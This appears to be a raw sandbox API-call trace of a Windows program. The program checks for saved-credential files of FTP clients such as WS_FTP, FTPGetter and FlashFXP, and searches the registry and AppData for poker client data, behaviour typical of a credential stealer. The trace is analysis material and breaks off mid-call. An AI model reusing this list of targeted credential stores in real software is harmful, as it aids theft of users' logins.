GetProcessHeap () returned 0x780000 [0314.443] GetProcessHeap () returned 0x780000 [0314.443] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b318 | out: hHeap=0x780000) returned 1 [0314.444] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.444] PathFileExistsW (pszPath="C:\\Program Files (x86)\\FTPGetter\\Profile\\servers.xml") returned 0 [0314.444] GetProcessHeap () returned 0x780000 [0314.444] GetProcessHeap () returned 0x780000 [0314.444] GetProcessHeap () returned 0x780000 [0314.445] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.445] wvsprintfW (in: param_1=0x79b318, param_2="%s\\FTPGetter\\servers.xml", arglist=0x19fb94 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPGetter\\servers.xml") returned 59 [0314.445] GetProcessHeap () returned 0x780000 [0314.445] GetProcessHeap () returned 0x780000 [0314.446] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.446] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPGetter\\servers.xml") returned 0 [0314.446] GetProcessHeap () returned 0x780000 [0314.446] GetProcessHeap () returned 0x780000 [0314.447] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0314.447] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0314.447] GetProcessHeap () returned 0x780000 [0314.448] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.448] wvsprintfW (in: param_1=0x79b318, param_2="%s\\WS_FTP\\WS_FTP.INI", arglist=0x19fb9c | out: param_1="C:\\Program Files (x86)\\WS_FTP\\WS_FTP.INI") returned 40 [0314.448] GetProcessHeap () returned 0x780000 [0314.448] GetProcessHeap () returned 0x780000 [0314.449] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.449] PathFileExistsW (pszPath="C:\\Program Files (x86)\\WS_FTP\\WS_FTP.INI") returned 0 [0314.449] GetProcessHeap () returned 0x780000 [0314.449] GetProcessHeap () returned 0x780000 [0314.449] GetProcessHeap () returned 0x780000 [0314.450] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Windows") returned 0x0 [0314.450] GetProcessHeap () returned 0x780000 [0314.452] wvsprintfW (in: param_1=0x79b318, param_2="%s\\WS_FTP.INI", arglist=0x19fb90 | out: param_1="C:\\Windows\\WS_FTP.INI") returned 21 [0314.452] GetProcessHeap () returned 0x780000 [0314.452] GetProcessHeap () returned 0x780000 [0314.452] PathFileExistsW (pszPath="C:\\Windows\\WS_FTP.INI") returned 0 [0314.452] GetProcessHeap () returned 0x780000 [0314.452] GetProcessHeap () returned 0x780000 [0314.452] GetProcessHeap () returned 0x780000 [0314.453] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0314.453] GetProcessHeap () returned 0x780000 [0314.454] wvsprintfW (in: param_1=0x79b318, param_2="%s\\Ipswitch", arglist=0x19fb78 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Ipswitch") returned 46 [0314.454] GetProcessHeap () returned 0x780000 [0314.454] GetProcessHeap () returned 0x780000 [0314.455] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Ipswitch") returned 0 [0314.455] GetProcessHeap () returned 0x780000 [0314.455] GetProcessHeap () returned 0x780000 [0314.455] GetProcessHeap () returned 0x780000 [0314.456] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX") returned 0x0 [0314.456] GetProcessHeap () returned 0x780000 [0314.457] wvsprintfW (in: param_1=0x79b318, param_2="%s\\site.xml", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\site.xml") returned 30 [0314.457] GetProcessHeap () returned 0x780000 [0314.457] GetProcessHeap () returned 0x780000 [0314.458] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\site.xml") returned 0 [0314.458] GetProcessHeap () returned 0x780000 [0314.458] GetProcessHeap () returned 0x780000 [0314.473] GetProcessHeap () returned 0x780000 [0314.473] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x794b68 [0314.474] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software", phkResult=0x794b68 | out: phkResult=0x794b68*=0x210) returned 0x0 [0314.474] GetProcessHeap () returned 0x780000 [0314.474] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x410) returned 0x79a2e8 [0314.475] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.476] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x0, pszName=0x79a2e8, pcchName=0x19fb90 | out: pszName="AppDataLow", pcchName=0x19fb90) returned 0x0 [0314.476] GetProcessHeap () returned 0x780000 [0314.476] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x799040 [0314.476] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.477] RegOpenKeyW (in: hKey=0x210, lpSubKey="AppDataLow", phkResult=0x799040 | out: phkResult=0x799040*=0x204) returned 0x0 [0314.477] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.478] StrStrW (lpFirst="AppDataLow", lpSrch="Full Tilt Poker") returned 0x0 [0314.478] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.479] RegCloseKey (hKey=0x204) returned 0x0 [0314.479] GetProcessHeap () returned 0x780000 [0314.479] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x799040 | out: hHeap=0x780000) returned 1 [0314.480] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.480] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x1, pszName=0x79a2e8, pcchName=0x19fb90 | out: pszName="IM Providers", pcchName=0x19fb90) returned 0x0 [0314.480] GetProcessHeap () returned 0x780000 [0314.480] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b440 [0314.481] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.481] RegOpenKeyW (in: hKey=0x210, lpSubKey="IM Providers", phkResult=0x79b440 | out: phkResult=0x79b440*=0x204) returned 0x0 [0314.482] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.482] StrStrW (lpFirst="IM Providers", lpSrch="Full Tilt Poker") returned 0x0 [0314.483] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.483] RegCloseKey (hKey=0x204) returned 0x0 [0314.483] GetProcessHeap () returned 0x780000 [0314.483] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b440 | out: hHeap=0x780000) returned 1 [0314.484] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.484] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x2, pszName=0x79a2e8, pcchName=0x19fb90 | out: pszName="Microsoft", pcchName=0x19fb90) returned 0x0 [0314.484] GetProcessHeap () returned 0x780000 [0314.484] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b340 [0314.485] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.485] RegOpenKeyW (in: hKey=0x210, lpSubKey="Microsoft", phkResult=0x79b340 | out: phkResult=0x79b340*=0x204) returned 0x0 [0314.486] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.486] StrStrW (lpFirst="Microsoft", lpSrch="Full Tilt Poker") returned 0x0 [0314.487] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.487] RegCloseKey (hKey=0x204) returned 0x0 [0314.487] GetProcessHeap () returned 0x780000 [0314.487] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b340 | out: hHeap=0x780000) returned 1 [0314.488] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.488] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x3, pszName=0x79a2e8, pcchName=0x19fb90 | out: pszName="Netscape", pcchName=0x19fb90) returned 0x0 [0314.488] GetProcessHeap () returned 0x780000 [0314.488] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b3a0 [0314.488] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.489] RegOpenKeyW (in: hKey=0x210, lpSubKey="Netscape", phkResult=0x79b3a0 | out: phkResult=0x79b3a0*=0x204) returned 0x0 [0314.490] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.490] StrStrW (lpFirst="Netscape", lpSrch="Full Tilt Poker") returned 0x0 [0314.491] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.492] RegCloseKey (hKey=0x204) returned 0x0 [0314.492] GetProcessHeap () returned 0x780000 [0314.492] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b3a0 | out: hHeap=0x780000) returned 1 [0314.493] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.493] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x4, pszName=0x79a2e8, pcchName=0x19fb90 | out: pszName="ODBC", pcchName=0x19fb90) returned 0x0 [0314.493] GetProcessHeap () returned 0x780000 [0314.493] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b470 [0314.494] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.495] RegOpenKeyW (in: hKey=0x210, lpSubKey="ODBC", phkResult=0x79b470 | out: phkResult=0x79b470*=0x204) returned 0x0 [0314.503] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.503] StrStrW (lpFirst="ODBC", lpSrch="Full Tilt Poker") returned 0x0 [0314.504] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.505] RegCloseKey (hKey=0x204) returned 0x0 [0314.505] GetProcessHeap () returned 0x780000 [0314.505] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b470 | out: hHeap=0x780000) returned 1 [0314.506] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.506] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x5, pszName=0x79a2e8, pcchName=0x19fb90 | out: pszName="Policies", pcchName=0x19fb90) returned 0x0 [0314.506] GetProcessHeap () returned 0x780000 [0314.506] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b4a0 [0314.507] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.509] RegOpenKeyW (in: hKey=0x210, lpSubKey="Policies", phkResult=0x79b4a0 | out: phkResult=0x79b4a0*=0x204) returned 0x0 [0314.510] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.511] StrStrW (lpFirst="Policies", lpSrch="Full Tilt Poker") returned 0x0 [0314.512] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.513] RegCloseKey (hKey=0x204) returned 0x0 [0314.513] GetProcessHeap () returned 0x780000 [0314.513] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b4a0 | out: hHeap=0x780000) returned 1 [0314.514] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.519] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x6, pszName=0x79a2e8, pcchName=0x19fb90 | out: pszName="RegisteredApplications", pcchName=0x19fb90) returned 0x0 [0314.519] GetProcessHeap () returned 0x780000 [0314.519] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b490 [0314.520] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.521] RegOpenKeyW (in: hKey=0x210, lpSubKey="RegisteredApplications", phkResult=0x79b490 | out: phkResult=0x79b490*=0x204) returned 0x0 [0314.522] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.522] StrStrW (lpFirst="RegisteredApplications", lpSrch="Full Tilt Poker") returned 0x0 [0314.523] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.524] RegCloseKey (hKey=0x204) returned 0x0 [0314.524] GetProcessHeap () returned 0x780000 [0314.524] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b490 | out: hHeap=0x780000) returned 1 [0314.525] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.525] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x7, pszName=0x79a2e8, pcchName=0x19fb90 | out: pszName="Wow6432Node", pcchName=0x19fb90) returned 0x0 [0314.525] GetProcessHeap () returned 0x780000 [0314.525] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b350 [0314.526] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.540] RegOpenKeyW (in: hKey=0x210, lpSubKey="Wow6432Node", phkResult=0x79b350 | out: phkResult=0x79b350*=0x204) returned 0x0 [0314.541] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.541] StrStrW (lpFirst="Wow6432Node", lpSrch="Full Tilt Poker") returned 0x0 [0314.546] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.547] RegCloseKey (hKey=0x204) returned 0x0 [0314.547] GetProcessHeap () returned 0x780000 [0314.547] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b350 | out: hHeap=0x780000) returned 1 [0314.548] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.548] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x8, pszName=0x79a2e8, pcchName=0x19fb90 | out: pszName="Classes", pcchName=0x19fb90) returned 0x0 [0314.548] GetProcessHeap () returned 0x780000 [0314.548] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b3c0 [0314.549] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.550] RegOpenKeyW (in: hKey=0x210, lpSubKey="Classes", phkResult=0x79b3c0 | out: phkResult=0x79b3c0*=0x204) returned 0x0 [0314.550] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.551] StrStrW (lpFirst="Classes", lpSrch="Full Tilt Poker") returned 0x0 [0314.555] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.555] RegCloseKey (hKey=0x204) returned 0x0 [0314.555] GetProcessHeap () returned 0x780000 [0314.555] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b3c0 | out: hHeap=0x780000) returned 1 [0314.556] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.557] SHEnumKeyExW (in: hkey=0x210, dwIndex=0x9, pszName=0x79a2e8, pcchName=0x19fb90 | out: pszName="", pcchName=0x19fb90) returned 0x103 [0314.557] GetProcessHeap () returned 0x780000 [0314.559] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.560] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0314.560] RegCloseKey (hKey=0x210) returned 0x0 [0314.560] GetProcessHeap () returned 0x780000 [0314.560] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x794b68 | out: hHeap=0x780000) returned 1 [0314.560] GetProcessHeap () returned 0x780000 [0314.560] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79a2e8 [0314.561] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0314.562] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x79a2e8 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0314.563] Sleep (dwMilliseconds=0xa) [0314.582] GetProcessHeap () returned 0x780000 [0314.582] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f4a) returned 0x79b520 [0314.583] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.583] wvsprintfW (in: param_1=0x79b520, param_2="%s\\%s", arglist=0x19f920 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\PokerStars*") returned 47 [0314.584] GetProcessHeap () returned 0x780000 [0314.584] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x62) returned 0x798dd8 [0314.584] GetProcessHeap () returned 0x780000 [0314.585] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0314.586] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\PokerStars*" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\pokerstars*"), lpFindFileData=0x19f934 | out: lpFindFileData=0x19f934*(dwFileAttributes=0x207d0, ftCreationTime.dwLowDateTime=0x6, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x798dd8, ftLastWriteTime.dwLowDateTime=0x11, ftLastWriteTime.dwHighDateTime=0x786b50, nFileSizeHigh=0x0, nFileSizeLow=0x11, dwReserved0=0x1010000, dwReserved1=0x11, cFileName="\x11", cAlternateFileName="ᕿ酰葪㓛")) returned 0xffffffff [0314.586] GetProcessHeap () returned 0x780000 [0314.587] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.587] GetProcessHeap () returned 0x780000 [0314.588] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.588] GetProcessHeap () returned 0x780000 [0314.588] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3e8) returned 0x79a2e8 [0314.588] GetProcessHeap () returned 0x780000 [0314.588] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xc) returned 0x78b568 [0314.588] GetProcessHeap () returned 0x780000 [0314.588] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79b520 [0314.590] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0314.591] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x79b520 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0314.591] GetProcessHeap () returned 0x780000 [0314.591] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5a) returned 0x79b730 [0314.593] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.593] wvsprintfW (in: param_1=0x79b730, param_2="%s\\ExpanDrive", arglist=0x19fb84 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ExpanDrive") returned 46 [0314.593] GetProcessHeap () returned 0x780000 [0314.593] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x60) returned 0x798dd8 [0314.594] GetProcessHeap () returned 0x780000 [0314.594] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b730 | out: hHeap=0x780000) returned 1 [0314.595] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.595] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ExpanDrive") returned 0 [0314.595] GetProcessHeap () returned 0x780000 [0314.598] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0314.598] GetProcessHeap () returned 0x780000 [0314.598] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.599] GetProcessHeap () returned 0x780000 [0314.599] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79b520 [0314.599] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0314.600] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x79b520 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0314.600] GetProcessHeap () returned 0x780000 [0314.600] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f5a) returned 0x79b730 [0314.601] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.602] wvsprintfW (in: param_1=0x79b730, param_2="%s\\ExpanDrive", arglist=0x19fb6c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ExpanDrive") returned 46 [0314.602] GetProcessHeap () returned 0x780000 [0314.602] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x60) returned 0x798dd8 [0314.602] GetProcessHeap () returned 0x780000 [0314.602] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b730 | out: hHeap=0x780000) returned 1 [0314.603] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.603] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\ExpanDrive") returned 0 [0314.603] GetProcessHeap () returned 0x780000 [0314.604] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0314.604] GetProcessHeap () returned 0x780000 [0314.604] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.604] GetProcessHeap () returned 0x780000 [0314.604] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a2e8 | out: hHeap=0x780000) returned 1 [0314.604] GetProcessHeap () returned 0x780000 [0314.611] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78b568 | out: hHeap=0x780000) returned 1 [0314.611] GetProcessHeap () returned 0x780000 [0314.611] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f6c) returned 0x79b520 [0314.612] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.613] wvsprintfW (in: param_1=0x79b520, param_2="%s\\Steed\\bookmarks.txt", arglist=0x19fba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Steed\\bookmarks.txt") returned 57 [0314.613] GetProcessHeap () returned 0x780000 [0314.613] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x76) returned 0x797190 [0314.613] GetProcessHeap () returned 0x780000 [0314.613] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0314.614] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.614] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Steed\\bookmarks.txt") returned 0 [0314.614] GetProcessHeap () returned 0x780000 [0314.614] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x797190 | out: hHeap=0x780000) returned 1 [0314.614] GetProcessHeap () returned 0x780000 [0314.614] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x400) returned 0x79a2e8 [0314.614] GetProcessHeap () returned 0x780000 [0314.614] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xc) returned 0x78b568 [0314.615] GetProcessHeap () returned 0x780000 [0314.615] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79b520 [0314.615] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0314.615] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x79b520 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0314.616] GetProcessHeap () returned 0x780000 [0314.616] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f56) returned 0x79b730 [0314.616] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.617] wvsprintfW (in: param_1=0x79b730, param_2="%s\\FlashFXP", arglist=0x19fb88 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashFXP") returned 46 [0314.617] GetProcessHeap () returned 0x780000 [0314.617] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x60) returned 0x798dd8 [0314.617] GetProcessHeap () returned 0x780000 [0314.617] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b730 | out: hHeap=0x780000) returned 1 [0314.618] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.618] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashFXP") returned 0 [0314.618] GetProcessHeap () returned 0x780000 [0314.618] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0314.619] GetProcessHeap () returned 0x780000 [0314.619] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.619] GetProcessHeap () returned 0x780000 [0314.619] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79b520 [0314.619] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0314.620] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x79b520 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0314.620] GetProcessHeap () returned 0x780000 [0314.620] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f56) returned 0x79b730 [0314.647] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.648] wvsprintfW (in: param_1=0x79b730, param_2="%s\\FlashFXP", arglist=0x19fb70 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashFXP") returned 46 [0314.648] GetProcessHeap () returned 0x780000 [0314.648] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x60) returned 0x798dd8 [0314.648] GetProcessHeap () returned 0x780000 [0314.649] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b730 | out: hHeap=0x780000) returned 1 [0314.649] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.650] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FlashFXP") returned 0 [0314.650] GetProcessHeap () returned 0x780000 [0314.650] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0314.650] GetProcessHeap () returned 0x780000 [0314.651] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798dd8 | out: hHeap=0x780000) returned 1 [0314.651] GetProcessHeap () returned 0x780000 [0314.651] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79b520 [0314.652] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0314.653] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x79b520 | out: pszPath="C:\\ProgramData") returned 0x0 [0314.654] GetProcessHeap () returned 0x780000 [0314.654] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f56) returned 0x79b730 [0314.655] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.655] wvsprintfW (in: param_1=0x79b730, param_2="%s\\FlashFXP", arglist=0x19fb58 | out: param_1="C:\\ProgramData\\FlashFXP") returned 23 [0314.655] GetProcessHeap () returned 0x780000 [0314.656] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x32) returned 0x78d448 [0314.656] GetProcessHeap () returned 0x780000 [0314.656] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b730 | out: hHeap=0x780000) returned 1 [0314.657] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0314.657] PathFileExistsW (pszPath="C:\\ProgramData\\FlashFXP") returned 0 [0314.657] GetProcessHeap () returned 0x780000 [0314.658] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1 [0314.658] GetProcessHeap () returned 0x780000 [0314.658] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78d448 | out: hHeap=0x780000) returned 1 [0314.658] GetProcessHeap () returned 0x780000 [0314.658] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x79b520 [0314.659] LoadLibraryW (lpLibFileName="SHELL32") returned 0x75db0000 [0314.659] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x79b520 | out: pszPath="C:\\ProgramData") returned 0x0 [0314.659] GetProcessHeap () returned 0x780000 [0314.659] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f56) returned 0x79b730 [0314.660] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0314.661] wvsprintfW (in: param_1=0x79b730, param_2="%s\\FlashFXP", arglist=0x19fb88 | out: param_1="C:\\ProgramData\\FlashFXP") returned 23 [0314.661] GetProcessHeap () returned 0x780000 [0314.661] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x32) 